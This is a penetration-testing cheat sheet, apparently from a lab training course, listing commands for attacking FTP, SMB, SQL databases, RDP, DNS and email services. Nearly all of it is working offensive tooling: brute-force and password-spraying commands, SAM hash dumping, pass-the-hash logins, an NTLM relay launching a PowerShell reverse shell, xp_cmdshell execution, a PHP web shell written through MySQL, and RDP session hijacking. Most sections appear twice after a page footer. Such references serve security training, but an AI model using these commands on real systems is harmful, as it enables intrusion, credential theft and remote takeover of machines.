Cheat Sheet - Attacking Common Services

Attacking FTP

Command

Description

ftp 192.168.2.142

Connecting to the FTP server using the ftp client.

nc -v 192.168.2.142 21

Connecting to the FTP server using netcat.

hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142

Brute-forcing the FTP service.

Attacking SMB

Command

Description

smbclient -N -L //10.129.14.128

Null-session testing against the SMB service.

smbmap -H 10.129.14.128

Network share enumeration using smbmap.

smbmap -H 10.129.14.128 -r notes

Recursive network share enumeration using smbmap.

smbmap -H 10.129.14.128 --download "notes\note.txt"

Download a specific file from the shared folder.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Upload a specific file to the shared folder.

rpcclient -U'%' 10.10.110.17

Null-session with the rpcclient.

./enum4linux-ng.py 10.10.11.45 -A -C

Automated enumeratition of the SMB service using enum4linux-ng.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

Password spraying against different users from a list.

impacket-psexec administrator:'Password123!'@10.10.110.17

Connect to the SMB service using the impacket-psexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Execute a command over the SMB service using crackmapexec.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Enumerating Logged-on users.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Extract hashes from the SAM database.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Use the Pass-The-Hash technique to authenticate on the target host.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Dump the SAM database using impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>

Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

Command

Description

mysql -u julio -pPassword123 -h 10.129.20.13

Connecting to the MySQL server.

sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30

Connecting to the MSSQL server.

sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h

Connecting to the MSSQL server from Linux.

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.

mysql> SHOW DATABASES;

Show all available databases in MySQL.

mysql> USE htbusers;

Select a specific database in MySQL.

mysql> SHOW TABLES;

Show all available tables in the selected database in MySQL.

mysql> SELECT * FROM users;

Select all available entries from the "users" table in MySQL.

sqlcmd> SELECT name FROM master.dbo.sysdatabases

Show all available databases in MSSQL.

sqlcmd> USE htbusers

Select a specific database in MSSQL.

sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES

Show all available tables in the selected database in MSSQL.

sqlcmd> SELECT * FROM users

Select all available entries from the "users" table in MSSQL.

sqlcmd> EXECUTE sp_configure 'show advanced options', 1

To allow advanced options to be changed.

sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1

To enable the xp_cmdshell.

sqlcmd> RECONFIGURE

To be used after each sp_configure command to apply the changes.

sqlcmd> xp_cmdshell 'whoami'

Execute a system command from MSSQL server.

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'

Create a file using MySQL.

mysql> show variables like "secure_file_priv";

Check if the the secure file privileges are empty to read locally stored files on the system.

sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Read local files in MSSQL.

mysql> select LOAD_FILE("/etc/passwd");

Read local files in MySQL.

sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'

Hash stealing using the xp_dirtree command in MSSQL.

sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'

Hash stealing using the xp_subdirs command in MSSQL.

sqlcmd> SELECT srvname, isremote FROM sysservers

Identify linked servers in MSSQL.

sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]

Identify the user and its privileges used for the remote connection in MSSQL.

Attacking RDP

Command

Description

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Password spraying against the RDP service.

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Brute-forcing the RDP service.

rdesktop -u admin -p password123 192.168.2.143

Connect to the RDP service using rdesktop in Linux.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

Impersonate a user without its password.

net start sessionhijack

Execute the RDP session hijack.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Enable "Restricted Admin Mode" on the target Windows host.

xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA

Use the Pass-The-Hash technique to login on the target host without a password.

Attacking DNS

Command

Description

dig AXFR @ns1.inlanefreight.htb inlanefreight.htb

Perform an AXFR zone transfer attempt against a specific name server.

subfinder -d inlanefreight.com -v

Brute-forcing subdomains.

host support.inlanefreight.com

DNS lookup for the specified subdomain.

Attacking Email Services

Command

Description

host -t MX microsoft.com

DNS lookup for mail servers for the specified domain.

dig mx inlanefreight.com \| grep "MX" \| grep -v ";"

DNS lookup for mail servers for the specified domain.

host -t A mail1.inlanefreight.htb.

DNS lookup of the IPv4 address for the specified subdomain.

telnet 10.10.110.20 25

Connect to the SMTP server.

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

SMTP user enumeration using the RCPT command against the specified host.

python3 o365spray.py --validate --domain msplaintext.xyz

Verify the usage of Office365 for the specified domain.

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

Enumerate existing users using Office365 on the specified domain.

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Password spraying against a list of users that use Office365 for the specified domain.

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

Brute-forcing the POP3 service.

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213

Testing the SMTP service for the open-relay vulnerability.

PreviousAttacking SQL Databases NextService Misconfigurations

Last updated 3 months ago

Attacking SMB

Command

Description

smbclient -N -L //10.129.14.128

Null-session testing against the SMB service.

smbmap -H 10.129.14.128

Network share enumeration using smbmap.

smbmap -H 10.129.14.128 -r notes

Recursive network share enumeration using smbmap.

smbmap -H 10.129.14.128 --download "notes\note.txt"

Download a specific file from the shared folder.

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

Upload a specific file to the shared folder.

rpcclient -U'%' 10.10.110.17

Null-session with the rpcclient.

./enum4linux-ng.py 10.10.11.45 -A -C

Automated enumeratition of the SMB service using enum4linux-ng.

crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'

Password spraying against different users from a list.

impacket-psexec administrator:'Password123!'@10.10.110.17

Connect to the SMB service using the impacket-psexec.

crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

Execute a command over the SMB service using crackmapexec.

crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Enumerating Logged-on users.

crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Extract hashes from the SAM database.

crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Use the Pass-The-Hash technique to authenticate on the target host.

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Dump the SAM database using impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>

Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

Command

Description

mysql -u julio -pPassword123 -h 10.129.20.13

Connecting to the MySQL server.

sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30

Connecting to the MSSQL server.

sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h

Connecting to the MSSQL server from Linux.

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.

mysql> SHOW DATABASES;

Show all available databases in MySQL.

mysql> USE htbusers;

Select a specific database in MySQL.

mysql> SHOW TABLES;

Show all available tables in the selected database in MySQL.

mysql> SELECT * FROM users;

Select all available entries from the "users" table in MySQL.

sqlcmd> SELECT name FROM master.dbo.sysdatabases

Show all available databases in MSSQL.

sqlcmd> USE htbusers

Select a specific database in MSSQL.

sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES

Show all available tables in the selected database in MSSQL.

sqlcmd> SELECT * FROM users

Select all available entries from the "users" table in MSSQL.

sqlcmd> EXECUTE sp_configure 'show advanced options', 1

To allow advanced options to be changed.

sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1

To enable the xp_cmdshell.

sqlcmd> RECONFIGURE

To be used after each sp_configure command to apply the changes.

sqlcmd> xp_cmdshell 'whoami'

Execute a system command from MSSQL server.

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'

Create a file using MySQL.

mysql> show variables like "secure_file_priv";

Check if the the secure file privileges are empty to read locally stored files on the system.

sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents

Read local files in MSSQL.

mysql> select LOAD_FILE("/etc/passwd");

Read local files in MySQL.

sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'

Hash stealing using the xp_dirtree command in MSSQL.

sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'

Hash stealing using the xp_subdirs command in MSSQL.

sqlcmd> SELECT srvname, isremote FROM sysservers

Identify linked servers in MSSQL.

sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]

Identify the user and its privileges used for the remote connection in MSSQL.

Attacking RDP

Command

Description

crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

Password spraying against the RDP service.

hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Brute-forcing the RDP service.

rdesktop -u admin -p password123 192.168.2.143

Connect to the RDP service using rdesktop in Linux.

tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

Impersonate a user without its password.

net start sessionhijack

Execute the RDP session hijack.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Enable "Restricted Admin Mode" on the target Windows host.

xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA

Use the Pass-The-Hash technique to login on the target host without a password.

Attacking Email Services

Command

Description

host -t MX microsoft.com

DNS lookup for mail servers for the specified domain.

dig mx inlanefreight.com \| grep "MX" \| grep -v ";"

DNS lookup for mail servers for the specified domain.

host -t A mail1.inlanefreight.htb.

DNS lookup of the IPv4 address for the specified subdomain.

telnet 10.10.110.20 25

Connect to the SMTP server.

smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

SMTP user enumeration using the RCPT command against the specified host.

python3 o365spray.py --validate --domain msplaintext.xyz

Verify the usage of Office365 for the specified domain.

python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz

Enumerate existing users using Office365 on the specified domain.

python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz

Password spraying against a list of users that use Office365 for the specified domain.

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3

Brute-forcing the POP3 service.

swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213

Testing the SMTP service for the open-relay vulnerability.